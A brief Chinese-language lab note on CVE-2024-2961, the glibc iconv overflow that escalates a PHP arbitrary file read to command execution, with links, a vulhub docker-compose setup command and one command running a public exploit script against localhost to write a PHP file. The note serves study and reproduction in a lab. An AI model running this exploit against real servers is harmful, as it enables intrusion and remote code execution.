ref: https://www.ambionics.io/blog/iconv-cve-2024-2961-p1

Linux glibc 的库函数 iconv 存在缓冲区溢出漏洞,可以利用该漏洞将 PHP 任意文件读取提升为命令执行

原作者给出了利用脚本,在找到任意文件读取漏洞点的前提下,可以使用脚本尝试 RCE

vulhub 提供了漏洞环境

docker-compose -f vulhub/php/CVE-2024-2961/docker-compose.yml up -d

根据实际「任意文件读取」漏洞点的不同需要修改脚本,默认情况是可以通过 index.php 的 file 参数直接读取文件

uv run ./cnext-exploit.py http://localhost:8080/index.php "echo '<?php phpinfo();?>' > info.php"

漏洞分析

https://www.freebuf.com/articles/web/403508.html

本质上是 glibc 的漏洞,以后有能力再看分析😤